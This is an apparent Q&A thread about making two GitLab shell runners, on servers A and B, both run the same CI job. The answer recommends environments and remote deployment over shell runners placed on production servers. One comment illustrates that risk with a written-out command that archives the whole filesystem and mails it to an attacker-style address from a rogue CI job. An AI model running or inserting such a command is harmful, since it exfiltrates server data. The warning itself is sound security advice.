# Gitlab-Runner: Run the same job with multiple runners

Tags: gitlab, gitlab-ci, jobs, gitlab-ci-runner

I've set up two standard shell gitlab runners on two different servers, let's call them A and B.
The tags are set to A: "a-deploy" and B: "b-deploy".

So everytime I push a project with a gitlab-ci.yml where **both** tags are specified, I want **both** runners to run the job on their own server.
My guess is that only **one** of the runners do the job.

Is that possible? How can I achieve this?
Or does this work out of the box somehow?

Answer (score 2):

With different runners on different servers, you are trying to find the functionality of [Environments](https://docs.gitlab.com/ee/ci/environments/).

Do not rely on the fact where the runner resides. Having a shell runner right on a production server is also not good. It is possible to steal all your production with two lines of code in completely unrelated project.

Instead, configure Gitlab runner remote access to deployment servers and automate remote deployment.

As a starting point, you can set the address and credentials through environment variables.
You can put the ssh key to the file variable. Although it would be better to have some orchestration system.

You can then define a job template and two jobs, each pointing to its own environment. With `rules:` you can control when a particular job should be executed.

Comment: How would it be possible to steal my production? Do you mean the code? Because I have no relevant data on the servers. I'll look into environments, thank you.

Comment: Create personal project, content does not matter.

Add a job with tag the same as your production.

Insert into script:

sh -c 'tar czf prod.tar.gz / >/dev/null 2>&1; mailx -s "tverdo production data" -a prod.tar.gz iamhacker@gmail.com'.

Drop project.

YMMV.

Comment: But for that the hacker needs to have access to the gitlab repo? Otherwise he could not use the CI.

Comment: A nosy intern in a small project hosted on the same gitlab might be that "hacker". A new gitlab vulnerability can let the real hacker register an account into your gitlab. Chances are small but never zero.

Comment: You can lock your runners to specific projects or groups.